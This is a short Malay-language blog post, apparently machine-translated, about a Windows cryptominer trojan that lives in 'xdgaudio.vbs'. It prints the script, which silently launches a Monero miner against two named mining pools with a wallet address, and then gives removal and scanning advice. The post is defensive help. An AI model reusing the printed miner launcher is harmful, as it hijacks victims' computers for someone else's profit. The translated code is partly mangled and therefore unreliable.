Sekiranya anda menerima mesej ralat berikut yang berkaitan dengan 'xdgaudio.vbs' di sistem anda, kemungkinan besar komputer anda dijangkiti.
Skrip: C: windows xdgaudio.vbs
Garis: 3
Caj: 1
Ralat: Sistem tidak dapat mencari fail yang ditentukan.
Kod: 80070002
Sumber: (batal)
Apabila diedit dengan Notepad, skrip mungkin mengandungi baris seperti di bawah:
Dim WShell Set WShell = CreateObject ('WScript.Shell') WShell.Run 'wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum + tcp: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o stratum + tcp: //mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv p x ', 0 Tetapkan WShell = Tiada
Ini tentunya kelihatan seperti trojan Miner CPU / cryptocurrency yang bukan sahaja melambatkan komputer anda, tetapi juga boleh menimbulkan ancaman keselamatan. Fail skrip c: windows xdgaudio.vbs dan c: windows servicecrsssr.vbs harus dihapuskan. Ini tidak cukup. Jalankan imbasan menyeluruh menggunakan perisian antimalware Malwarebytes, dan juga imbas dengan perisian antivirus yang anda gunakan.
Untuk arahan terperinci mengenai membuang Miner Trojan seperti itu, lihat panduan malwaretips.com Cara menghapus Trojan Miner CPU dari Windows (Panduan Bantuan Virus) .
Satu permintaan kecil: Sekiranya anda menyukai siaran ini, sila bagikan ini?
Satu bahagian 'kecil' dari anda akan sangat membantu perkembangan blog ini. Beberapa cadangan hebat:- Pin ia!
- Kongsi ke blog kegemaran anda + Facebook, Reddit
- Tweet!